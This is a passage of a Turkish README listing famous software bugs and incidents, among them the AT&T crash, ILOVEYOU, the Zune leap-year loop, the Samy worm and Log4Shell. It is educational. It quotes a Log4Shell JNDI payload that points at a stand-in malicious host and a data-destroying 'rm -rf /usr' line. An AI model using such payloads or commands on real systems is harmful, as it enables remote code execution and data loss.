AT\u0026T'nin ağını birkaç saatliğine kapattı.\n\u003e\n\u003e [MakeUseOf](https://www.makeuseof.com/tag/worst-programming-mistakes-in-history/)\n\nBu çöküşten önce, AT\u0026T'nin uzun mesafe ağı güvenilir ve güçlü olarak kabul edilirdi. Ülkenin uzun mesafe trafiğinin %70'inden fazlasını taşıyor ve 115 milyondan fazla telefon görüşmesi yapıyordu. Bu çöküş, AT\u0026T müşterilerinin yaptığı 75 milyon cevapsız arama ve 200.000 havayolu ve otel rezervasyon iptali nedeniyle telefon ağına güvenen işletmelerin 60 milyon dolarlık kaybıyla sonuçlandı.\n\nHata, güncellenmiş kurtarma yazılımındaki bir switch ifadesindeki olan if ifadesindeki bir break komutu nedeniyle oluştu. Bütün switch'ler, komşu switch'lerin güvenilir olup olmadığını belirlemeye çalışırken aynı anda hepsi erişilemez hale geldi.\n\n```bash\n1  while (ring receive buffer not empty  and side buffer not empty) DO\n2    Initialize pointer to first message in side buffer or ring receive buffer\n3    get copy of buffer\n4    switch (message)\n5       case (incoming_message):\n6             if (sending switch is out of service) DO\n7                 if (ring write buffer is empty) DO\n8                     send \"in service\" to status map\n9                 else\n10                    break\n11            END IF\n12            process incoming message, set up pointers to optional parameters\n13            break\n14      END SWITCH\n15   do optional parameter work\n```\n\nEk kaynaklar:\n\n- [1990 AT\u0026amp;T Uzun Mesafe Ağı Çöküşü](https://jonhtaylor.com/the-1990-att-long-distance-network-collapse/)\n- [Tüm Devreler Şu Anda Meşgul: 1990 AT\u0026amp;T Uzun Mesafe Ağının Çöküşü](https://users.csc.calpoly.edu/~jdalbey/SWE/Papers/att_collapse.html)\n\n### ILOVEYOU Solucanı\n\n\u003e Olaylar, Pet Shop Boys'un İngiltere'nin 2002'deki ilk on albümü Release'deki \"E-mail\" şarkısına ilham verdi.\n\u003e\n\u003e [Wikipedia](https://en.wikipedia.org/wiki/ILOVEYOU#Impact)\n\nILOVEYOU solucanı, Onel de Guzman (Manila Filipinler'de bir üniversite öğrencisi) tarafından yaratıldı ve 4 Mayıs 2000'den sonra on milyondan fazla Windows kişisel bilgisayarına bulaştı. Amacı, hizmet için ödeme yapmadan diğer kullanıcıların internet hesaplarını kullanabilmek için şifrelerini çalmaktı. Windows 95'te e-posta eklentilerinde kod çalıştıran bir hata olduğu için solucanı yaratmanın çok kolay olduğunu belirtti.\n\nBaşlangıçta, solucanı yalnızca Manila'da çalışacak şekilde tasarladı. Meraktan, bu coğrafi kısıtlamayı kaldırdı ve solucanın dünya çapında yayılmasına izin verdi. Elbette bunun dünya çapında yayılmasını beklemiyordu. Solucan önce Hong Kong'a, sonra Avrupa'ya ve son olarak da Amerika Birleşik Devletleri'ne bulaştı. On gün içinde, elli milyondan fazla bulaşma (dünyadaki internete bağlı bilgisayarların% 10'u) rapor edildi. Pentagon, CIA, Britanya Parlamentosu ve bir çok büyük şirket kendilerini korumak için posta sistemlerini tamamen kapatmaya karar verdi.\n\nSolucan, kullanıcılara kodu değiştirmenin bir yolunu sağladı ve her biri farklı türde zararlar veren yirmi beşten fazla ILOVEYOU varyasyonunun internete yayılmasına sebep oldu.\n\nBu solucan, kötü amaçlı yazılımların gerçek tehdidi konusunda bir kamu bilinci yarattı ve antivirüs yazılımı sağlayıcıları altın bir dağıtım çağına girdi. Buna ek olarak, birçok kişinin klasik virüs dağıtım sistemleri olan e-postalara karşı daha şüpheci olmasına yardımcı oldu.\n\nEk kaynaklar:\n\n- [Wikipedia'da ILOVEYOU](https://en.wikipedia.org/wiki/ILOVEYOU)\n- [ILOVEYOU hatasından on yıl sonra](https://www.bbc.com/news/10095957)\n\n### Zune Bug\n\n\u003e 30GB Zunes sahipleri için kıyamet günü geldi ...\n\u003e\n\u003e [ArsTechnica](https://arstechnica.com/information-technology/2008/12/30gb-zunes-prepare-for-new-year-by-locking-up/)\n\n31 Aralık 2008'de birçok Zune Player sahibi, oyuncunun donmaya başladığını bildirmeye başladı. Microsoft'un yanıtı, ertesi güne kadar beklemekti ve donma kendi kendine çözülecekti. Nedeni, artık yıllarda sonsuz döngüye neden olan basit bir döngüydü. Artık yıllar düşünülmeden kodlanmış basit bir döngü kontrol ifadesi bu karışıklığa neden oluyordu.\n\nİşte sorunlu döngü;\n\n```bash\nyear = ORIGINYEAR;\nwhile (days \u003e 365)\n{\n    if (IsLeapYear(year))\n    {\n        if (days \u003e 366)\n        {\n            days -= 366;\n            year += 1;\n        }\n    }\n    else\n    {\n        days -= 365;\n        year += 1;\n    }\n}\n```\n\nEk kaynaklar:\n\n- [Zune Hatası](http://bit-player.org/2009/the-zune-bug)\n\n### Unutulmuş Boşluk Karakteri\n\n\u003e Büyük hata... /usr klasörü siliniyor... kusura bakmayın....\n\u003e\n\u003e [MrMEEE](https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issues/123#issuecomment-1226289)\n\n[Bumblebee](https://github.com/Bumblebee-Project/Bumblebee), Nvidia Optimus özellikli dizüstü bilgisayarların GNU/Linux sistemleriyle çalışmasını sağlayacak bir projedir. 24 Mayıs 2011'de kurulum betiğinin _/usr/_ klasörünü sildiğine bildiren bir [hata kaydı](https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issues/123) açıldı. Hatanın sebebi yanlış yazılmış ve unutulmuş bir boşluk karakteriydi. Hatanın etkisi çok can yakıcıydı çünkü kurbanın işletim sistemini yeniden kurması gerekiyordu. [Hata kaydı](https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issues/123) hala ilgi çekiyor. Baktığınızda güncel yorumları görürsünüz (7 Mart 2021).\n\n```bash\n....\nrm -rf /usr /lib/nvidia-current/xorg/xorg\n....\n```\n\n### Rachel True'nun iCloud'da Yaşadığı Problem\n\n\u003e Aplle iCloud'da bu hatayla karşılaşan başka birileri var mı? Eskiden karşılaşan ya da şimdi karşılaşan? ...\n\u003e\n\u003e [Rachel True](https://twitter.com/RachelTrue/status/1365461618977476610)\n\nRachel True iCloud'a giriş yaparken bir hata ile karşılaştığını Twitter'da paylaştı. Bu hata büyük ihtmalle iCloud'ın \"True\" olan soyadını boolean bir değer olarak işlediği için ortaya çıkıyor olabilir. Paylaşımında 6 aydır giriş yapamadığını ve problemin 27 Şubat 2021'de hala geçerli olduğunu belirtti. Tweet çok popüler olduğu için muhtemelen iCloud ekibinin dikkatini çekmiştir ve sorun kısa sürede çözülecektir.\n\nBu aslında çok sık görülen ve basit bir hata, çünkü yazılımcılar kodlama yaparken kullanılan değerlerinin tiplerinin kontrol edilmesinin ne kadar önemli olduğunu unutmaya meyillidirler. Bu duruma verebileceğimiz diğer örnekler;\n\n- [Jesse Self](https://twitter.com/JesseSelf720/status/1368247643827281926)\n- [Hello, I'm Mr. Null. My Name Makes Me Invisible to Computers](https://www.wired.com/2015/11/null/)\n\n### MySpace Solucan (Samy Solucanı)\n\n\u003e Myspace birçok etiketin kullanılmasını engelliyor. Aslında bazılarına da izin veriyor ... vermemesi gerekenlere nazılarına da izin vermiş olabilir ...\n\u003e\n\u003e [Technical explanation of The MySpace Worm](https://samy.pl/myspace/tech.html)\n\nMySpace Solucanı [Samy Kamkar](https://en.wikipedia.org/wiki/Samy_Kamkar) tarafından yazılmış XSS temelli ve bir sosyal ağ olan MySpace üzerinde yayılması için tasarlanmış bir solucandır. Solucan görece zararsız olmasına rağmen Kamkar internet erişimi olmayan tek bir bilgisayar kullanabileceği üç yıllık bir denetimli serbestlik ve birkaç farklı cezaya çarptırıldı. Bu solucan ve hikayesi XSS açıklarının nelere sebep olabileceğini gösteren güzel bir öernek olabilir.\n\nEk kaynaklar;\n\n- [The MySpace Worm](https://samy.pl/myspace/)\n\n### Şifre Hash İşlemini Bozan \"PHP Hack\" Problemi\n\n\u003e crypt_blowfish algoritmasında PHP'ye özel yapılan bir değişiklikten kaynaklandı ...\n\u003e\n\u003e [Phpmagazine](https://phpmagazine.net/2023/03/the-phphack-that-broke-password-hashing.html)\n\n```C\nif (tmp == '$') break; /* PHP hack */ \\\n```\n\n\"salt\" kısımlarında $ içeren hatalı biçimlendirilmiş BCrypt şifreleri, arabelleğin yanlış (buffer overread) okunmasını tetikleyerek herhangi bir şifreyinin yanlışlıkla geçerli olarak doğrulanabilmesini sağlıyordu. Dolayısıyla bu durum uygulamalarda güvenlik açıklarına neden oldu.\n\nHata ve düzeltilmesi, programlama topluluğu arasında farklı programlama dillerinin yararları ve bunların güçlü ve zayıf yönleri hakkında birçok tartışmaya yol açtı.\n\nEk kaynaklar;\n\n- [https://bugs.php.net/bug.php?id=81744](https://bugs.php.net/bug.php?id=81744)\n- [https://github.com/php/php-src/security/advisories/GHSA-7fj2-8×79-rjf4](https://github.com/php/php-src/security/advisories/GHSA-7fj2-8×79-rjf4)\n\n### Log4Shell - İnterneti Çökertebilecek Güvenlik Açığı\n\n\u003e Dünyadaki tüm Java uygulamaları etkilenebilir. %10'u bile büyük bir problem olur. Bu felaket olur.\n\u003e\n\u003e [Christian Grobmeier, Log4j geliştiricisi](https://github.blog/open-source/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell/)\n\nAralık 2021'de bir güvenlik araştırmacısı, dünya çapında milyonlarca uygulama tarafından kullanılan yaygın bir Java günlük kütüphanesi olan Log4j'de kritik bir güvenlik açığı keşfetti. Log4Shell (CVE-2021-44228) olarak adlandırılan bu açık, mümkün olan en yüksek puan olan 10 CVSS puanı aldı. Saldırının uygulanması korkutucu derecede basitti: saldırganlar, kullanıcı adları, arama kutuları ve hatta Minecraft sohbet mesajları gibi günlüğe kaydedilen herhangi bir girdi alanına kötü amaçlı bir JNDI dizesi enjekte ederek uzaktan kod çalıştırabiliyorlardı.\n\nBu güvenlik açığı, Log4j'nin Java Naming and Directory Interface (JNDI) aracılığıyla uzak sunuculardan yazılım bileşenlerini yükleme özelliğini istismar ediyordu, ancak kütüphane bu lookup dizelerinin güvenilir kaynaklardan gelip gelmediğini doğrulamıyordu. `${jndi:ldap://malicious-server.com/exploit}` gibi basit bir dize tüm sistemleri tehlikeye atabiliyordu.\n\nLog4Shell, Fortune 500 şirketleri, devlet sistemleri ve Minecraft gibi popüler uygulamalar dahil olmak üzere milyarlarca cihazı etkiledi. Bu olay, kritik açık kaynak altyapısını sürdürmenin gizli insan maliyetini ortaya çıkardı, çünkü gönüllü geliştiriciler kendilerini internetin yarısını etkileyen bir güvenlik açığını yamalamakla sorumlu buldular. Bu kriz, kritik açık kaynak projelerini daha iyi desteklemek ve güvence altına almak için GitHub Secure Open Source Fund gibi girişimlere yol açtı.\n\nEk kaynaklar:\n\n- [Log4Shell'in anlatılmamış hikayesi](https://github.blog/open-source/inside-the-breach-that-broke-the-internet-the-untold-story-of-log4shell/)\n- [Log4Shell güvenlik açığı](https://en.wikipedia.org/wiki/Log4Shell)\n\n## AI\n\n### Microsoft Tay Chatbot (2016)\n\n\u003e Tay: Microsoft urkçı chatbot fiyaskosu yüzünden özür diledi\n\u003e\n\u003e [BBC](https://www.bbc.com/news/technology-35902104)\n\nMicrosoft Tay adında Twitter platformunda kullanıcılarla etkileşime giren bir chatbot yayınladı. Bir kaç saat gibi bısa bir süre içinde Tay Twitter'daki zehirli kültürden etkilenerek saldırgan ve ırkçı yorumlar yapmaya başladı. Olay, çevrimiçi etkileşimleri sorumlu bir şekilde yönetebilen yapay zeka sistemlerinin tasarlanmasındaki zorlukları gözler önüne serdi.\n\n## Çeviriler\n\nBu belge birkaç dilde mevcuttur.\n\n| Dil                                                                                   | Çeviren                                 |\n| ------------------------------------------------------------------------------------- | --------------------------------------- |\n| [🇹🇷 Türkçe / Türkçe](https://github.com/umutphp/famous-bugs/blob/master/README-tr.md) | [Umut Işık](https://github.com/umutphp) |\n\nBir çeviriyi güncellemek veya yeni bir dil eklemek isterseniz, [bir PR açmanız yeterlidir](https://github.com/umutphp/famous-bugs/pulls) .\n\n## Katkıda Bulunmak İçin\n\nLütfen katkıda bulunun! :pray:\n\nBir hata bildirmek için ya da ekleme yapılması için [Issue](https://github.com/umutphp/famous-bugs/issues/new) açın. Kendiniz yapmak isterseniz [pull request](https://github.com/umutphp/famous-bugs/pulls) açabilirsiniz.\n\nLütfen [Katkıda Bulunma Kuralları](./.github/contributing.md) ve [Davranış Kuralları](./.github/CODE_OF_CONDUCT.md) belgelerini okuyun.\n","funding_links":["https://patreon.com/umutphp"],"categories":["Others"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fumutphp%2Ffamous-bugs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fumutphp%2Ffamous-bugs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fumutphp%2Ffamous-bugs/lists"}